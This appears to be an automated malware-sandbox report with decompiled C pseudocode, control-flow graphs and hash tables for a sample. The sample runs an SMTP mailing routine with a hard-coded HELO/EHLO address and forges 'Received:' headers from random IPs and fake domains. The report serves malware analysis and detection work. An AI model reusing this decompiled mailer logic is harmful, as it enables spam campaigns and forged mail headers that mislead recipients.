                                                                                                                                                                                                                                                                  					_t59 = _t59 + 4;
                                                                                                                                                                                                                                                                  					goto L7;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x009021d9
                                                                                                                                                                                                                                                                  0x009021e0
                                                                                                                                                                                                                                                                  0x009021e8
                                                                                                                                                                                                                                                                  0x009021ed
                                                                                                                                                                                                                                                                  0x009021f2
                                                                                                                                                                                                                                                                  0x009021f7
                                                                                                                                                                                                                                                                  0x009021fa
                                                                                                                                                                                                                                                                  0x00902207
                                                                                                                                                                                                                                                                  0x00902296
                                                                                                                                                                                                                                                                  0x0090229d
                                                                                                                                                                                                                                                                  0x009022bb
                                                                                                                                                                                                                                                                  0x00902306
                                                                                                                                                                                                                                                                  0x00902313
                                                                                                                                                                                                                                                                  0x0090231e
                                                                                                                                                                                                                                                                  0x00902338
                                                                                                                                                                                                                                                                  0x00902345
                                                                                                                                                                                                                                                                  0x0090234d
                                                                                                                                                                                                                                                                  0x00902355
                                                                                                                                                                                                                                                                  0x0090235a
                                                                                                                                                                                                                                                                  0x00902345
                                                                                                                                                                                                                                                                  0x00902313
                                                                                                                                                                                                                                                                  0x0090235f
                                                                                                                                                                                                                                                                  0x0090220d
                                                                                                                                                                                                                                                                  0x0090220d
                                                                                                                                                                                                                                                                  0x00902217
                                                                                                                                                                                                                                                                  0x0090222a
                                                                                                                                                                                                                                                                  0x0090222f
                                                                                                                                                                                                                                                                  0x00902234
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090223f
                                                                                                                                                                                                                                                                  0x00902245
                                                                                                                                                                                                                                                                  0x0090224a
                                                                                                                                                                                                                                                                  0x00902250
                                                                                                                                                                                                                                                                  0x00902256
                                                                                                                                                                                                                                                                  0x0090225c
                                                                                                                                                                                                                                                                  0x00902262
                                                                                                                                                                                                                                                                  0x00902264
                                                                                                                                                                                                                                                                  0x00902266
                                                                                                                                                                                                                                                                  0x00902268
                                                                                                                                                                                                                                                                  0x0090226d
                                                                                                                                                                                                                                                                  0x0090227d
                                                                                                                                                                                                                                                                  0x00902282
                                                                                                                                                                                                                                                                  0x00902282
                                                                                                                                                                                                                                                                  0x00902285
                                                                                                                                                                                                                                                                  0x0090228e
                                                                                                                                                                                                                                                                  0x00902293
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902293

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\336362908233226.jpg, xrefs: 009021ED
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountExitThreadTick_wfopenfclosefgetsrandsrandstrcpystrtok
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\336362908233226.jpg
                                                                                                                                                                                                                                                                  • API String ID: 1857396134-3015275168
                                                                                                                                                                                                                                                                  • Opcode ID: 0c9eef04cb8dacfbbb49442d5e03b4ed2a446341316a287c25b1d2f4f0d25185
                                                                                                                                                                                                                                                                  • Instruction ID: 46b2e0360ae207102467c612912b9672df6fba451e1583be7136d2ea0d24b2ee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9eef04cb8dacfbbb49442d5e03b4ed2a446341316a287c25b1d2f4f0d25185
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 243162B6D8021C9FDB24EBA0DC8EBD9737CABA4305F0445E8E518621C1E6759BD4CF91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 191 9027cc-902841 __set_app_type __p__fmode __p__commode call 90294b 194 902843-90284e __setusermatherr 191->194 195 90284f-9028a6 call 902936 _initterm __getmainargs _initterm 191->195 194->195 198 9028e2-9028e5 195->198 199 9028a8-9028b0 195->199 202 9028e7-9028eb 198->202 203 9028bf-9028c3 198->203 200 9028b2-9028b4 199->200 201 9028b6-9028b9 199->201 200->199 200->201 201->203 204 9028bb-9028bc 201->204 202->198 205 9028c5-9028c7 203->205 206 9028c9-9028da GetStartupInfoA 203->206 204->203 205->204 205->206 207 9028dc-9028e0 206->207 208 9028ed-9028ef 206->208 209 9028f0-9028fb GetModuleHandleA call 902660 207->209 208->209 211 902900-90291d exit _XcptFilter 209->211
                                                                                                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                                                                                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                  				CHAR* _v8;
                                                                                                                                                                                                                                                                  				intOrPtr* _v24;
                                                                                                                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                                                                                                                  				struct _STARTUPINFOA _v96;
                                                                                                                                                                                                                                                                  				int _v100;
                                                                                                                                                                                                                                                                  				char** _v104;
                                                                                                                                                                                                                                                                  				int _v108;
                                                                                                                                                                                                                                                                  				void _v112;
                                                                                                                                                                                                                                                                  				char** _v116;
                                                                                                                                                                                                                                                                  				intOrPtr* _v120;
                                                                                                                                                                                                                                                                  				intOrPtr _v124;
                                                                                                                                                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                                                                                                                                                  				intOrPtr* _t24;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  				void _t29;
                                                                                                                                                                                                                                                                  				intOrPtr _t36;
                                                                                                                                                                                                                                                                  				signed int _t38;
                                                                                                                                                                                                                                                                  				int _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                                                                                                                                  				intOrPtr _t47;
                                                                                                                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                                                                                                                                  				intOrPtr _t58;
                                                                                                                                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                                                                                                                  				_push(0x9039c8);
                                                                                                                                                                                                                                                                  				_push(0x90294c);
                                                                                                                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                  				 *[fs:0x0] = _t58;
                                                                                                                                                                                                                                                                  				_v28 = _t58 - 0x68;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				__set_app_type(2);
                                                                                                                                                                                                                                                                  				 *0x904930 =  *0x904930 | 0xffffffff;
                                                                                                                                                                                                                                                                  				 *0x904934 =  *0x904934 | 0xffffffff;
                                                                                                                                                                                                                                                                  				_t23 = __p__fmode();
                                                                                                                                                                                                                                                                  				_t46 =  *0x90492c; // 0x0
                                                                                                                                                                                                                                                                  				 *_t23 = _t46;
                                                                                                                                                                                                                                                                  				_t24 = __p__commode();
                                                                                                                                                                                                                                                                  				_t47 =  *0x904928; // 0x0
                                                                                                                                                                                                                                                                  				 *_t24 = _t47;
                                                                                                                                                                                                                                                                  				 *0x904938 = _adjust_fdiv;
                                                                                                                                                                                                                                                                  				_t27 = E0090294B( *_adjust_fdiv);
                                                                                                                                                                                                                                                                  				_t61 =  *0x904050; // 0x1
                                                                                                                                                                                                                                                                  				if(_t61 == 0) {
                                                                                                                                                                                                                                                                  					__setusermatherr(E00902948);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E00902936(_t27);
                                                                                                                                                                                                                                                                  				_push(0x90400c);
                                                                                                                                                                                                                                                                  				_push(0x904008);
                                                                                                                                                                                                                                                                  				L00902930();
                                                                                                                                                                                                                                                                  				_t29 =  *0x904924; // 0x0
                                                                                                                                                                                                                                                                  				_v112 = _t29;
                                                                                                                                                                                                                                                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x904920,  &_v112);
                                                                                                                                                                                                                                                                  				_push(0x904004);
                                                                                                                                                                                                                                                                  				_push(0x904000);
                                                                                                                                                                                                                                                                  				L00902930();
                                                                                                                                                                                                                                                                  				_t55 =  *_acmdln;
                                                                                                                                                                                                                                                                  				_v120 = _t55;
                                                                                                                                                                                                                                                                  				if( *_t55 != 0x22) {
                                                                                                                                                                                                                                                                  					while( *_t55 > 0x20) {
                                                                                                                                                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                  						_v120 = _t55;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                  						_v120 = _t55;
                                                                                                                                                                                                                                                                  						_t42 =  *_t55;
                                                                                                                                                                                                                                                                  					} while (_t42 != 0 && _t42 != 0x22);
                                                                                                                                                                                                                                                                  					if( *_t55 == 0x22) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                                                                                                                                                  						_v120 = _t55;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t36 =  *_t55;
                                                                                                                                                                                                                                                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                                                                                                                                                                                                  					goto L6;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v96.dwFlags = 0;
                                                                                                                                                                                                                                                                  				GetStartupInfoA( &_v96);
                                                                                                                                                                                                                                                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                  					_t38 = 0xa;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_push(_t38);
                                                                                                                                                                                                                                                                  				_push(_t55);
                                                                                                                                                                                                                                                                  				_push(0);
                                                                                                                                                                                                                                                                  				_push(GetModuleHandleA(0)); // executed
                                                                                                                                                                                                                                                                  				_t40 = E00902660(); // executed
                                                                                                                                                                                                                                                                  				_v108 = _t40;
                                                                                                                                                                                                                                                                  				exit(_t40);
                                                                                                                                                                                                                                                                  				_t41 = _v24;
                                                                                                                                                                                                                                                                  				_t49 =  *((intOrPtr*)( *_t41));
                                                                                                                                                                                                                                                                  				_v124 = _t49;
                                                                                                                                                                                                                                                                  				_push(_t41);
                                                                                                                                                                                                                                                                  				_push(_t49);
                                                                                                                                                                                                                                                                  				L0090292A();
                                                                                                                                                                                                                                                                  				return _t41;
                                                                                                                                                                                                                                                                  			}





























                                                                                                                                                                                                                                                                  0x009027cf
                                                                                                                                                                                                                                                                  0x009027d1
                                                                                                                                                                                                                                                                  0x009027d6
                                                                                                                                                                                                                                                                  0x009027e1
                                                                                                                                                                                                                                                                  0x009027e2
                                                                                                                                                                                                                                                                  0x009027ef
                                                                                                                                                                                                                                                                  0x009027f4
                                                                                                                                                                                                                                                                  0x009027f9
                                                                                                                                                                                                                                                                  0x00902800
                                                                                                                                                                                                                                                                  0x00902807
                                                                                                                                                                                                                                                                  0x0090280e
                                                                                                                                                                                                                                                                  0x00902814
                                                                                                                                                                                                                                                                  0x0090281a
                                                                                                                                                                                                                                                                  0x0090281c
                                                                                                                                                                                                                                                                  0x00902822
                                                                                                                                                                                                                                                                  0x00902828
                                                                                                                                                                                                                                                                  0x00902831
                                                                                                                                                                                                                                                                  0x00902836
                                                                                                                                                                                                                                                                  0x0090283b
                                                                                                                                                                                                                                                                  0x00902841
                                                                                                                                                                                                                                                                  0x00902848
                                                                                                                                                                                                                                                                  0x0090284e
                                                                                                                                                                                                                                                                  0x0090284f
                                                                                                                                                                                                                                                                  0x00902854
                                                                                                                                                                                                                                                                  0x00902859
                                                                                                                                                                                                                                                                  0x0090285e
                                                                                                                                                                                                                                                                  0x00902863
                                                                                                                                                                                                                                                                  0x00902868
                                                                                                                                                                                                                                                                  0x00902881
                                                                                                                                                                                                                                                                  0x00902887
                                                                                                                                                                                                                                                                  0x0090288c
                                                                                                                                                                                                                                                                  0x00902891
                                                                                                                                                                                                                                                                  0x0090289e
                                                                                                                                                                                                                                                                  0x009028a0
                                                                                                                                                                                                                                                                  0x009028a6
                                                                                                                                                                                                                                                                  0x009028e2
                                                                                                                                                                                                                                                                  0x009028e7
                                                                                                                                                                                                                                                                  0x009028e8
                                                                                                                                                                                                                                                                  0x009028e8
                                                                                                                                                                                                                                                                  0x009028a8
                                                                                                                                                                                                                                                                  0x009028a8
                                                                                                                                                                                                                                                                  0x009028a8
                                                                                                                                                                                                                                                                  0x009028a9
                                                                                                                                                                                                                                                                  0x009028ac
                                                                                                                                                                                                                                                                  0x009028ae
                                                                                                                                                                                                                                                                  0x009028b9
                                                                                                                                                                                                                                                                  0x009028bb
                                                                                                                                                                                                                                                                  0x009028bb
                                                                                                                                                                                                                                                                  0x009028bc
                                                                                                                                                                                                                                                                  0x009028bc
                                                                                                                                                                                                                                                                  0x009028b9
                                                                                                                                                                                                                                                                  0x009028bf
                                                                                                                                                                                                                                                                  0x009028c3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x009028c9
                                                                                                                                                                                                                                                                  0x009028d0
                                                                                                                                                                                                                                                                  0x009028da
                                                                                                                                                                                                                                                                  0x009028ef
                                                                                                                                                                                                                                                                  0x009028dc
                                                                                                                                                                                                                                                                  0x009028dc
                                                                                                                                                                                                                                                                  0x009028dc
                                                                                                                                                                                                                                                                  0x009028f0
                                                                                                                                                                                                                                                                  0x009028f1
                                                                                                                                                                                                                                                                  0x009028f2
                                                                                                                                                                                                                                                                  0x009028fa
                                                                                                                                                                                                                                                                  0x009028fb
                                                                                                                                                                                                                                                                  0x00902900
                                                                                                                                                                                                                                                                  0x00902904
                                                                                                                                                                                                                                                                  0x0090290a
                                                                                                                                                                                                                                                                  0x0090290f
                                                                                                                                                                                                                                                                  0x00902911
                                                                                                                                                                                                                                                                  0x00902914
                                                                                                                                                                                                                                                                  0x00902915
                                                                                                                                                                                                                                                                  0x00902916
                                                                                                                                                                                                                                                                  0x0090291d

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 801014965-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3cc351043ce24be736166d1bf6a5ebd6189f0a6a4598dddda3a1bcd8302659a3
                                                                                                                                                                                                                                                                  • Instruction ID: a85f0e75285077699a2c8a37be7daa655f979399be67c2156d1e110195343f94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc351043ce24be736166d1bf6a5ebd6189f0a6a4598dddda3a1bcd8302659a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 324181B5815304EFDB24DFA4DD49AAA7BBCFB49B10F20411EFA51972E1D7704940EB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 212 901b2d-901b3c StrStrA 213 901b60-901b7a wsprintfA 212->213 214 901b3e-901b5e wsprintfA 212->214 215 901b80-901b9c call 901120 213->215 214->215 218 901baa-901bb1 215->218 219 901b9e-901ba5 215->219 220 902159 218->220 219->220 222 901a9a-901a9e 220->222 223 90215e-90217a shutdown closesocket 220->223 222->223 224 901aa4-901ab4 call 901160 222->224 227 902180-902186 223->227 228 901ab9-901ac9 224->228 229 901ad0-901aef call 9011c0 228->229 230 901acb 228->230 233 901af1 229->233 234 901af6-901b15 229->234 230->223 233->223 234->220 235 901b1b 234->235 235->220
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wsprintf$closesocketshutdown
                                                                                                                                                                                                                                                                  • String ID: EHLO %s$HELO %s$[84.17.52.51]
                                                                                                                                                                                                                                                                  • API String ID: 4205972133-2682500817
                                                                                                                                                                                                                                                                  • Opcode ID: 44146fa92e6fcf684fc51474c5d4dbc9cbfb391b09f9e697f75d62e8f99e400e
                                                                                                                                                                                                                                                                  • Instruction ID: 87a9885bb66a7c6be7dffb4ccd1f8058183961b148821ed2b8a115f526c830f2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44146fa92e6fcf684fc51474c5d4dbc9cbfb391b09f9e697f75d62e8f99e400e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 282150B1E04218DFCF10CBA0DC49BAEB37CBB88704F0085A9F309A22C0D7395655CB19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 236 901bb6-901c0d wsprintfA * 2 call 901120 239 901c1b-901c22 236->239 240 901c0f-901c16 236->240 241 902159 239->241 240->241 243 901a9a-901a9e 241->243 244 90215e-90217a shutdown closesocket 241->244 243->244 245 901aa4-901ab4 call 901160 243->245 248 902180-902186 244->248 249 901ab9-901ac9 245->249 250 901ad0-901aef call 9011c0 249->250 251 901acb 249->251 254 901af1 250->254 255 901af6-901b15 250->255 251->244 254->244 255->241 256 901b1b 255->256 256->241
                                                                                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                                                                                  			E00901BB6(void* __eflags) {
                                                                                                                                                                                                                                                                  				void* _t160;
                                                                                                                                                                                                                                                                  				intOrPtr _t164;
                                                                                                                                                                                                                                                                  				void* _t165;
                                                                                                                                                                                                                                                                  				void* _t190;
                                                                                                                                                                                                                                                                  				void* _t192;
                                                                                                                                                                                                                                                                  				void* _t195;
                                                                                                                                                                                                                                                                  				void* _t197;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					wsprintfA(_t190 - 0x88, "<%s>",  *((intOrPtr*)(_t190 + 8)));
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t190 - 0x498)) = wsprintfA(_t190 - 0x490, "MAIL FROM: %s\r\n", _t190 - 0x88);
                                                                                                                                                                                                                                                                  					_t160 = E00901120( *((intOrPtr*)(_t190 - 0x1c)), _t190 - 0x490,  *((intOrPtr*)(_t190 - 0x498))); // executed
                                                                                                                                                                                                                                                                  					_t195 = _t192 + 0x24;
                                                                                                                                                                                                                                                                  					if(_t160 != 0) {
                                                                                                                                                                                                                                                                  						 *(_t190 - 0x20) = 4;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L46:
                                                                                                                                                                                                                                                                  					while( *(_t190 - 0x20) != 0 &&  *(_t190 - 0x20) != 8) {
                                                                                                                                                                                                                                                                  						_t164 = E00901160( *((intOrPtr*)(_t190 - 0x1c)), _t190 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                  						_t197 = _t195 + 0xc;
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t190 - 0x90)) = _t164;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t190 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                  							L5:
                                                                                                                                                                                                                                                                  							 *((char*)(_t190 +  *((intOrPtr*)(_t190 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                  							_t165 = E009011C0(_t190 - 0x490);
                                                                                                                                                                                                                                                                  							_t195 = _t197 + 4;
                                                                                                                                                                                                                                                                  							if(_t165 != 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *(_t190 - 0x718) =  *(_t190 - 0x20);
                                                                                                                                                                                                                                                                  								 *(_t190 - 0x718) =  *(_t190 - 0x718) - 1;
                                                                                                                                                                                                                                                                  								if( *(_t190 - 0x718) > 6) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								L8:
                                                                                                                                                                                                                                                                  								switch( *((intOrPtr*)( *(_t190 - 0x718) * 4 +  &M00902188))) {
                                                                                                                                                                                                                                                                  									case 0:
                                                                                                                                                                                                                                                                  										L9:
                                                                                                                                                                                                                                                                  										_push("ESMTP");
                                                                                                                                                                                                                                                                  										if(StrStrA(_t190 - 0x490) == 0) {
                                                                                                                                                                                                                                                                  											_t169 = wsprintfA(_t190 - 0x490, "HELO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t190 - 0x494) = _t169;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											_t172 = wsprintfA(_t190 - 0x490, "EHLO %s\r\n", "[84.17.52.51]");
                                                                                                                                                                                                                                                                  											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                  											 *(_t190 - 0x494) = _t172;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t171 = E00901120( *((intOrPtr*)(_t190 - 0x1c)), _t190 - 0x490,  *(_t190 - 0x494)); // executed
                                                                                                                                                                                                                                                                  										_t195 = _t198 + 0xc;
                                                                                                                                                                                                                                                                  										if(_t171 != 0) {
                                                                                                                                                                                                                                                                  											 *(_t190 - 0x20) = 3;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(_t190 - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 1:
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 2:
                                                                                                                                                                                                                                                                  										goto L0;
                                                                                                                                                                                                                                                                  									case 3:
                                                                                                                                                                                                                                                                  										L18:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 4:
                                                                                                                                                                                                                                                                  										L21:
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 5:
                                                                                                                                                                                                                                                                  										L24:
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                  										E00901320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  										__ebp - 0x710 = E00901490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                  										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                  										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  										__eax = E00901490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                  										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xfe;
                                                                                                                                                                                                                                                                  										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                  										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                  										__eax = rand();
                                                                                                                                                                                                                                                                  										asm("cdq");
                                                                                                                                                                                                                                                                  										__ecx = 0xd2;
                                                                                                                                                                                                                                                                  										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                  										E00901390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                  										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                  										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x710;
